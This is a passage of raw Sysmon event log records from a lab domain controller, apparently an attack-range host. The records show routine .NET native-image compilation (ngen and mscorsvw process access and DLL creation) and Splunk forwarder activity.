\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000021257Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:02.286{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1FE-60D3-2F04-00000000CF01}5592C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021256Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:02.270{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A1FE-60D3-2F04-00000000CF01}5592C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021255Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:02.255{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1FE-60D3-2F04-00000000CF01}5592C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000021254Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:05:02.223{4DB9351A-A1FE-60D3-2E04-00000000CF01}3944C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\f68-0\MMCFxCommon.dll2021-06-23 21:05:02.223 10341000x800000000000000021253Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:02.098{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1FE-60D3-2E04-00000000CF01}3944C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021252Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:02.051{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A1FE-60D3-2E04-00000000CF01}3944C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021251Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:02.051{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1FE-60D3-2E04-00000000CF01}3944C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 354300x800000000000000021285Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:02.263{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61434-false10.0.1.12-8000- 23542300x800000000000000021284Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:03.692{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C109CC1352D7EB0043356C9E9F8655FF,SHA256=1B4FC466D7CDB78AC5CDBDC6D76E024B60B176050B45549F1A1F95832D440C3F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000021283Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:03.551{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1FF-60D3-3604-00000000CF01}7148C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021282Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:03.536{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A1FF-60D3-3604-00000000CF01}7148C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021281Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:03.536{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1FF-60D3-3604-00000000CF01}7148C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000021280Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:03.380{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1FF-60D3-3504-00000000CF01}7104C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021279Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:03.364{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A1FF-60D3-3504-00000000CF01}7104C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021278Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:03.364{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1FF-60D3-3504-00000000CF01}7104C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000021277Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:05:03.333{4DB9351A-A1FF-60D3-3404-00000000CF01}3840C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\f00-0\napinit.dll2021-06-23 21:05:03.333 10341000x800000000000000021276Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:03.239{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1FF-60D3-3404-00000000CF01}3840C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021275Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:03.224{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A1FF-60D3-3404-00000000CF01}3840C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021274Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:03.224{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1FF-60D3-3404-00000000CF01}3840C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000021273Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:03.161{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1FF-60D3-3304-00000000CF01}6728C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021272Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:03.131{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A1FF-60D3-3304-00000000CF01}6728C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021271Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:03.131{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1FF-60D3-3304-00000000CF01}6728C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000021270Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:05:03.114{4DB9351A-A1FF-60D3-3204-00000000CF01}6512C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1970-0\napcrypt.dll2021-06-23 21:05:03.098 10341000x800000000000000021269Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:03.051{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1FF-60D3-3204-00000000CF01}6512C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021268Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:03.020{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A1FF-60D3-3204-00000000CF01}6512C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021267Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:03.020{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1FF-60D3-3204-00000000CF01}6512C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000021312Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 